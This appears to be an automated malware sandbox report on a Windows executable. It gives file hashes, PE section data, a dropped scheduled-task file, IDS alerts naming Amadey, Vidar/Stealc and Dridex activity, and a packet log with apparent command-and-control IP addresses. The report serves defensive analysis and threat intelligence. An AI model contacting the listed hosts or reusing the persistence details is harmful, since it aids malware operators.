SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\IRqsWvBBMc.exe
File Type:	data
Category:	dropped
Size (bytes):	304
Entropy (8bit):	3.4426809914351297
Encrypted:	false
SSDEEP:	6:xHg5jXlXUEZ+lX1lOJUPelkDdtE9+AQy0l1Xot0:xHC1Q1lOmeeDs9+nV14t0
MD5:	BD909F1383BF0797E4B9EE41936DA087
SHA1:	59BB77AD9965C023048AE796F0ECFE84A537C706
SHA-256:	710F74B0413517EE1D176AE22109720614CCE4E30822D08780D9A8E58A188163
SHA-512:	885CC5736C770C64FD1846F77D918277DF2EC5A3408AEAE61080957D352AA5725B7EF70D25AF347EB1218E3A7B2867946A6F35B05D91EEF0B4E50356BC95D5AF
Malicious:	false
Preview:	....oj..h.YK.X...E.F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................9.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.95154004137865
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	IRqsWvBBMc.exe
File size:	1'947'648 bytes
MD5:	78343efcb6f731cd7668e648ed73e40f
SHA1:	7d7d8ff1aa08a1e4bfc766ec8a59576de2e49e99
SHA256:	f0cca8a13c6f8d768fb49efc17a0181cde1c28f9afb0be916b441bcdf75194ae
SHA512:	b1ac74c99b8adc1782c869849e05046410f4b7cdb395a9752f46d07a00fc6b94d767d50c0df971eb99a3e138d9ae14619ec17bbcbceae44a8dfbd5c32cae102d
SSDEEP:	49152:3NuQyW519T77T9gssw0Z7kiEfK45vQHOG/dW:3k90l39gd7kiUK4pQHOk
TLSH:	E99533BE09D73D59F29984F5B746066620F842318C7086BA63A09637CF637F0DA9EF50
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8d4000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F4AE128509Ah
setbe byte ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4d2a78	0x10	erhqbccx
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4d2a28	0x18	erhqbccx
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	843f64b6b2c90936af469febbc01745a	False	0.9970410422343324	PGP Secret Sub-key -	7.978392023788185	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	80c8f3c4564460c14afa9a357192d85f	False	0.576171875	data	4.49411475214692	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2be000	0x200	a32c95b6bf61e6c2484b90a6dc3ea0e2	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
erhqbccx	0x329000	0x1aa000	0x1a9e00	ad0cc837577ca7b7061a28f7af3accdd	False	0.9946336357132375	data	7.954389255607031	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uokpdgqw	0x4d3000	0x1000	0x400	2e63f2c8398ce6fd93b4a86d22db3b8c	False	0.8232421875	data	6.206425104358081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4d4000	0x3000	0x2200	1be9bad00ce9c88ca157017f222e0796	False	0.05997242647058824	DOS executable (COM)	0.7354610814514625	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4d2a88	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T12:57:14.062255+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60785	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:08.251725+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	60779	80	192.168.2.6	185.215.113.16
2024-07-26T12:58:02.137733+0200	TCP	2054495	ET MALWARE Vidar Stealer Form Exfil	60852	80	192.168.2.6	77.91.101.71
2024-07-26T12:57:54.209832+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	60836	198.46.178.145	192.168.2.6
2024-07-26T12:56:47.197530+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	60776	20.114.59.183	192.168.2.6
2024-07-26T12:57:45.082487+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60831	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:20.110087+0200	TCP	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	443	60793	5.75.212.60	192.168.2.6
2024-07-26T12:57:24.333325+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	60798	5.75.212.60	192.168.2.6
2024-07-26T12:57:03.819607+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	60778	80	192.168.2.6	185.215.113.16
2024-07-26T12:57:16.709500+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60789	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:32.470357+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	60812	5.75.212.60	192.168.2.6
2024-07-26T12:58:00.607625+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60850	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:20.865992+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60796	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:47.120744+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60834	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:09.097227+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	60779	185.215.113.16	192.168.2.6
2024-07-26T12:57:06.691169+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	60778	185.215.113.16	192.168.2.6
2024-07-26T12:57:19.446065+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60793	443	192.168.2.6	5.75.212.60
2024-07-26T12:58:09.642132+0200	TCP	2036752	ET MALWARE Suspected BPFDoor TCP Magic Packet (Inbound)	1110	60854	91.92.250.213	192.168.2.6
2024-07-26T12:57:39.040939+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60823	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:04.103660+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	80	60778	185.215.113.16	192.168.2.6
2024-07-26T12:57:43.565361+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60829	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:17.951760+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60791	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:37.483798+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60820	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:25.346141+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60803	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:26.556702+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60805	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:33.859158+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60815	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:22.345846+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60798	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:29.578629+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60809	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:04.345407+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	60778	80	192.168.2.6	185.215.113.16
2024-07-26T12:56:45.881578+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	60774	20.114.59.183	192.168.2.6
2024-07-26T12:57:08.494261+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	60779	80	192.168.2.6	185.215.113.16
2024-07-26T12:57:06.629014+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	60778	185.215.113.16	192.168.2.6
2024-07-26T12:57:10.822923+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	60780	80	192.168.2.6	185.215.113.16
2024-07-26T12:57:18.705865+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	443	60791	5.75.212.60	192.168.2.6
2024-07-26T12:57:35.797297+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60817	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:56.003578+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	60836	198.46.178.145	192.168.2.6
2024-07-26T12:57:31.633511+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60812	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:28.405558+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60807	443	192.168.2.6	5.75.212.60
2024-07-26T12:56:19.847039+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49714	20.12.23.50	192.168.2.6
2024-07-26T12:57:15.209645+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60787	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:17.251728+0200	TCP	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	60789	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:42.252981+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60827	443	192.168.2.6	5.75.212.60
2024-07-26T12:57:59.103857+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	60848	443	192.168.2.6	5.75.212.60

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 12:57:02.999768972 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:03.007311106 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:03.008899927 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:03.009041071 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:03.025932074 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:03.819545984 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:03.819607019 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:03.828130960 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:03.835333109 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.096501112 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.096570969 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.098330975 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.103660107 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.345313072 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.345407009 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.345663071 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.345673084 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.345698118 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.347448111 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.347455978 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.347484112 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.347516060 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.349503994 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.349513054 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.349546909 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.349564075 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.351777077 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.351788044 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.351843119 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.353586912 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.353596926 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.353611946 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.353631020 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.353660107 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.492790937 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.492991924 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.493094921 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.493228912 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.493803978 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.493813992 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.493858099 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.493885040 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.495002985 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.495049953 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.495915890 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.495925903 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.495965004 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.497813940 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.497824907 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.497844934 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.497852087 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.497876883 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.499640942 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.499650955 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.499697924 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.499697924 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.501486063 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.501497030 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.501532078 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.501555920 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.503115892 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.503125906 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.503170967 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.503170967 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.505384922 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.505395889 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.505431890 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.505458117 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.506541967 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.506553888 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.506582022 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.506592035 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.508011103 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.508025885 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.508039951 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.508063078 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.508084059 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.509609938 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.509665012 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.584400892 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.584491014 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.584750891 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.584811926 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.641649008 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.641709089 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.641824007 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.641834974 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.641913891 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.641913891 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.643203974 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.643250942 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.643511057 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.643556118 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.644265890 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.644275904 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.644310951 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.644325018 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.645962000 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.645972967 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.646007061 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.646022081 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.647439003 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.647449970 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.647488117 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.647510052 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.649056911 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.649068117 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.649084091 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.649102926 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.649117947 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.649130106 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.650619030 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.650633097 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.650649071 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.650661945 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.650672913 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.650696039 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.651967049 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.651982069 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.652013063 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.652028084 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.653212070 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.653223991 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.653259993 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.653280973 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.654436111 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.654449940 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.654479980 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.654495001 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.655713081 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.655725002 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.655740976 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.655759096 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.655776024 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.655776024 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.656977892 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.656985998 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.657056093 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.657068968 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.658262968 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.658273935 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.658298969 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.658313036 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.659446001 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.659457922 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.659492970 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.659507036 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.660623074 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.660634995 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:04.660674095 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:04.661820889 CEST	80	60778	185.215.113.16	192.168.2.6
